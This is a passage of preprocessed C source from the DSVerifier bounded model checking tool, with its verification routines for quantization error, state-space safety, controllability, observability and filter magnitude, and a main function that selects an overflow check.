# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
((void) sizeof ((
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ; else __assert_fail (
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
"__quant_error < error_limit && __quant_error > ((-1)*error_limit)"
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h", 354, __extension__ __PRETTY_FUNCTION__); }))
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
;
}
}
else {
for (i=0; i < 0; i++)
{
__quant_error = ss_system_quantization_error(x[i]);
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
((void) sizeof ((
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ; else __assert_fail (
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
"__quant_error < error_limit && __quant_error > ((-1)*error_limit)"
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h", 361, __extension__ __PRETTY_FUNCTION__); }))
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
;
}
}
return 0;
}
# 44 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
extern digital_system_state_space _controller;
extern double error_limit;
extern int closed_loop;
double fxp_ss_closed_loop_safety(){
double reference[4][4];
double result1[4][4];
double result2[4][4];
fxp_t K_fpx[4][4];
fxp_t outputs_fpx[4][4];
fxp_t result_fxp[4][4];
unsigned int i;
unsigned int j;
unsigned int k;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
reference[i][j]= (_controller.inputs[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<nOutputs;j++){
K_fpx[i][j]=0;
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
outputs_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result_fxp[i][j]=0;
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<nOutputs;j++){
K_fpx[i][j]= fxp_double_to_fxp(_controller.K[i][j]);
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
for (i = 1; i < 0; i++) {
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
if(flag == 1){
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
}
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
for(k=0; k<nOutputs;k++){
for(j=0; j<1;j++){
outputs_fpx[k][j]= fxp_double_to_fxp(_controller.outputs[k][j]);
}
}
fxp_matrix_multiplication(nInputs,nOutputs,nOutputs,1,K_fpx,outputs_fpx,result_fxp);
for(k=0; k<nInputs;k++){
for(j=0; j<1;j++){
result1[k][j]= fxp_to_double(result_fxp[k][j]);
}
}
printf("### fxp: U (before) = %.9f", _controller.inputs[0][0]);
printf("### fxp: reference = %.9f", reference[0][0]);
printf("### fxp: result1 = %.9f", result1[0][0]);
printf("### fxp: reference - result1 = %.9f", (reference[0][0] - result1[0][0]));
double_sub_matrix(nInputs,
1,
reference,
result1,
_controller.inputs);
printf("### fxp: Y = %.9f", _controller.outputs[0][0]);
printf("### fxp: U (after) = %.9f \n### \n### ", _controller.inputs[0][0]);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
}
return _controller.outputs[0][0];
}
int verify_safety_state_space(void){
fxp_t output_fxp = fxp_ss_closed_loop_safety();
double output_double = fxp_to_double(output_fxp);
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
((void) sizeof ((
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
output_double <= error_limit
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
output_double <= error_limit
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
) ; else __assert_fail (
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
"output_double <= error_limit"
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h", 140, __extension__ __PRETTY_FUNCTION__); }))
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
;
return 0;
}
# 45 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 1
# 14 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
extern digital_system_state_space _controller;
int verify_controllability(void){
int i;
int j;
fxp_t A_fpx[4][4];
fxp_t B_fpx[4][4];
fxp_t controllabilityMatrix[4][4];
fxp_t backup[4][4];
fxp_t backupSecond[4][4];
double controllabilityMatrix_double[4][4];
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
A_fpx[i][j] = 0.0;
B_fpx[i][j] = 0.0;
controllabilityMatrix[i][j] = 0.0;
backup[i][j] = 0.0;
backupSecond[i][j] = 0.0;
controllabilityMatrix_double[i][j] = 0.0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
B_fpx[i][j]= fxp_double_to_fxp(_controller.B[i][j]);
}
}
if(nInputs > 1){
int l = 0;
for(j=0; j<(nStates*nInputs);){
fxp_exp_matrix(nStates,nStates,A_fpx,l,backup);
l++;
fxp_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,B_fpx,backupSecond);
for(int k = 0; k < nInputs; k++){
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][k];
}
j++;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
backup[i][j]= 0.0;
}
}
fxp_transpose(controllabilityMatrix,backup,nStates,(nStates*nInputs));
fxp_t mimo_controllabilityMatrix_fxp[4][4];
fxp_matrix_multiplication(nStates,(nStates*nInputs),(nStates*nInputs),nStates,controllabilityMatrix,backup,mimo_controllabilityMatrix_fxp);
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
controllabilityMatrix_double[i][j]= fxp_to_double(mimo_controllabilityMatrix_fxp[i][j]);
}
}
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix_double,nStates) != 0"
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 91, __extension__ __PRETTY_FUNCTION__); }))
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
} else {
for(j=0; j<nStates;j++){
fxp_exp_matrix(nStates,nStates,A_fpx,j,backup);
fxp_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,B_fpx,backupSecond);
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][0];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
controllabilityMatrix_double[i][j]= fxp_to_double(controllabilityMatrix[i][j]);
}
}
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix_double,nStates) != 0"
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 113, __extension__ __PRETTY_FUNCTION__); }))
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
}
return 0;
}
int verify_controllability_double(void){
int i;
int j;
double controllabilityMatrix[4][4];
double backup[4][4];
double backupSecond[4][4];
double controllabilityMatrix_double[4][4];
if(nInputs > 1){
int l = 0;
for(j=0; j<(nStates*nInputs);){
double_exp_matrix(nStates,nStates,_controller.A,l,backup);
l++;
double_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,_controller.B,backupSecond);
for(int k = 0; k < nInputs; k++){
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][k];
}
j++;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
backup[i][j]= 0.0;
}
}
transpose(controllabilityMatrix,backup,nStates,(nStates*nInputs));
double mimo_controllabilityMatrix_double[4][4];
double_matrix_multiplication(nStates,(nStates*nInputs),(nStates*nInputs),nStates,controllabilityMatrix,backup,mimo_controllabilityMatrix_double);
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(mimo_controllabilityMatrix_double,nStates) != 0
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(mimo_controllabilityMatrix_double,nStates) != 0
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(mimo_controllabilityMatrix_double,nStates) != 0"
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 154, __extension__ __PRETTY_FUNCTION__); }))
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
} else {
for(j=0; j<nStates;j++){
double_exp_matrix(nStates,nStates,_controller.A,j,backup);
double_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,_controller.B,backupSecond);
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][0];
}
}
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix,nStates) != 0
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix,nStates) != 0
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix,nStates) != 0"
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 163, __extension__ __PRETTY_FUNCTION__); }))
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
}
return 0;
}
# 46 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
extern digital_system_state_space _controller;
int verify_observability(void){
int i;
int j;
fxp_t A_fpx[4][4];
fxp_t C_fpx[4][4];
fxp_t observabilityMatrix[4][4];
fxp_t backup[4][4];
fxp_t backupSecond[4][4];
double observabilityMatrix_double[4][4];
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix[i][j]= 0;
A_fpx[i][j]=0;
C_fpx[i][j]= 0;
backup[i][j]= 0;
backupSecond[i][j]= 0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
C_fpx[i][j]= fxp_double_to_fxp(_controller.C[i][j]);
}
}
if(nOutputs > 1){
int l;
j = 0;
for(l=0; l<nStates;){
fxp_exp_matrix(nStates,nStates,A_fpx,l,backup);
l++;
fxp_matrix_multiplication(nOutputs,nStates,nStates,nStates,C_fpx,backup,backupSecond);
for(int k = 0; k < nOutputs; k++){
for(i = 0; i<nStates;i++){
observabilityMatrix[j][i]= backupSecond[k][i];
}
j++;
}
}
# 80 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nOutputs);j++){
backup[i][j]= 0.0;
}
}
fxp_transpose(observabilityMatrix,backup,(nStates*nOutputs),nStates);
# 99 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
fxp_t mimo_observabilityMatrix_fxp[4][4];
fxp_matrix_multiplication(nStates,(nStates*nOutputs),(nStates*nOutputs),nStates,backup,observabilityMatrix,mimo_observabilityMatrix_fxp);
# 112 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix_double[i][j]= fxp_to_double(mimo_observabilityMatrix_fxp[i][j]);
}
}
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
((void) sizeof ((
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ; else __assert_fail (
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
"determinant(observabilityMatrix_double,nStates) != 0"
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h", 119, __extension__ __PRETTY_FUNCTION__); }))
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
;
}else{
for(i=0; i<nStates;i++){
fxp_exp_matrix(nStates,nStates,A_fpx,i,backup);
fxp_matrix_multiplication(nOutputs,nStates,nStates,nStates,C_fpx,backup,backupSecond);
for(j = 0; j<nStates;j++){
observabilityMatrix[i][j]= backupSecond[0][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix_double[i][j]= fxp_to_double(observabilityMatrix[i][j]);
}
}
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
((void) sizeof ((
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ; else __assert_fail (
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
"determinant(observabilityMatrix_double,nStates) != 0"
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h", 134, __extension__ __PRETTY_FUNCTION__); }))
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
;
}
return 0;
}
# 47 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h"
extern filter_parameters filter;
extern implementation impl;
extern digital_system ds;
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h"
void resp_mag(double* num, int lnum, double* den, int lden, double* res, int N) {
double w;
int m, i;
double out_numRe[N + 1];
double out_numIm[N + 1];
double out_denRe[N + 1];
double out_denIm[N + 1];
double old_out_Re;
double zero_test;
for (w = 0, i = 0; w <= 3.14159265358979323846; w += 3.14159265358979323846 / N, ++i) {
out_numRe[i] = num[0];
out_numIm[i] = 0;
for (m = 1; m < lnum; ++m) {
old_out_Re = out_numRe[i];
out_numRe[i] = cosTyl(w, 6) * out_numRe[i] - sinTyl(w, 6) * out_numIm[i] + num[m];
out_numIm[i] = sinTyl(w, 6) * old_out_Re + cosTyl(w, 6) * out_numIm[i];
}
out_denRe[i] = den[0];
out_denIm[i] = 0;
for (m = 1; m < lden; ++m) {
old_out_Re = out_denRe[i];
out_denRe[i] = cosTyl(w, 6) * out_denRe[i] - sinTyl(w, 6) * out_denIm[i] + den[m];
out_denIm[i] = sinTyl(w, 6) * old_out_Re + cosTyl(w, 6) * out_denIm[i];
}
res[i] = sqrt3(out_numRe[i] * out_numRe[i] + out_numIm[i] * out_numIm[i]);
zero_test = sqrt3(out_denRe[i] * out_denRe[i] + out_denIm[i] * out_denIm[i]);
__DSVERIFIER_assume(zero_test != 0);
res[i] = res[i] / zero_test;
}
}
int verify_magnitude(void) {
int freq_response_samples = 100;
double w;
double w_incr = 1.0 / freq_response_samples;
double res[freq_response_samples+1];
int i,j;
fxp_t a_fxp[ds.a_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
double _a[ds.a_size];
fxp_to_double_array(_a, a_fxp, ds.a_size);
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
double _b[ds.b_size];
fxp_to_double_array(_b, b_fxp, ds.b_size);
resp_mag(ds.b, ds.b_size, ds.a, ds.a_size, res, freq_response_samples);
if (filter.type == 1) {
for (i = 0, w = 0; (w <= 1.0); ++i, w += w_incr) {
if (w <= filter.wp) {
__DSVERIFIER_assert_msg(res[i] >= filter.Ap, "|----------------Passband Failure-------------|");
} else if (w == filter.wc) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ac, "|-------------Cutoff Frequency Failure--------|");
} else if ((w >= filter.wr) && (w <= 1)) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ar, "|----------------Stopband Failure-------------|");
}
}
} else if (filter.type == 2) {
for (i = 0, w = 0; (w <= 1.0); ++i, w += w_incr) {
if (w <= filter.wr) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ar, "|----------------Stopband Failure-------------|");
} else if (w == filter.wc) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ac, "|-------------Cutoff Frequency Failure--------|");
} else if ((w > filter.wp) && (w <= 1)) {
__DSVERIFIER_assert_msg(res[i] >= filter.Ap, "|----------------Passband Failure-------------|");
}
}
} else {
__DSVERIFIER_assert(0);
}
return 0;
}
# 48 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
extern digital_system ds;
extern digital_system plant;
digital_system plant_cbmc;
extern digital_system controller;
extern implementation impl;
extern hardware hw;
extern digital_system_state_space _controller;
extern filter_parameters filter;
unsigned int nondet_uint();
extern void initials();
void validation();
void call_verification_task(void * verification_task);
void call_closedloop_verification_task(void * closedloop_verification_task);
float nondet_float();
double nondet_double();
int main(){
initialization();
validation();
if (1 == 0)
rounding_mode = 0;
else if (1 == 1)
rounding_mode = 1;
else if (1 == 2)
rounding_mode = 2;
if (3 == 3)
{
call_verification_task(&verify_overflow);
}
else if (3 == 2)
{
call_verification_task(&verify_limit_cycle);
}
else if (3 == 6)
{
call_verification_task(&verify_error);
}
else if (3 == 1)
{
call_verification_task(&verify_zero_input_limit_cycle);
}
else if (3 == 4)
{
call_verification_task(&verify_timing_msp_430);
}
else if (3 == 5)
{
call_verification_task(&verify_generic_timing);
}
else if (3 == 7)
{
call_verification_task(&verify_stability);
}
else if (3 == 8)
{
call_verification_task(&verify_minimum_phase);
}
else if (3 == 9)
{
call_closedloop_verification_task(&verify_stability_closedloop_using_dslib);
}
else if (3 == 10)
{
call_closedloop_verification_task(&verify_limit_cycle_closed_loop);
}
else if (3 == 11)
{
call_closedloop_verification_task(&verify_error_closedloop);
}
else if (3 == 12)
{
verify_error_state_space();
}
else if (3 == 16)
{
verify_safety_state_space();
}
else if (3 == 13)
{
verify_controllability();
}
else if (3 == 14)
{
verify_observability();
}
else if (3 == 15)
{
verify_limit_cycle_state_space();
}
else if (3 == 18)
{
call_verification_task(&verify_magnitude);
}
return 0;
}
void validation()
{
if (3 == 12 || 3 == 16 ||
3 == 15 || 3 == 13 ||
3 == 14)
{
if (0 == 0)
{
printf("\n\n********************************************************************************************\n");
printf("* set a K_SIZE to use this property in DSVerifier (use: -DK_SIZE=VALUE) *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
exit(1);
}
initials();
return;
}
if (((3 != 9) && (3 != 10) &&
(3 != 11)) && (ds.a_size == 0 || ds.b_size == 0))
{
printf("\n\n****************************************************************************\n");
printf("* set (ds and impl) parameters to check with DSVerifier *\n");
printf("****************************************************************************\n");
__DSVERIFIER_assert(0);
}
if ((3 == 9) || (3 == 10) ||
(3 == 11))
{
if (controller.a_size == 0 || plant.b_size == 0 || impl.int_bits == 0 )
{
printf("\n\n*****************************************************************************************************\n");
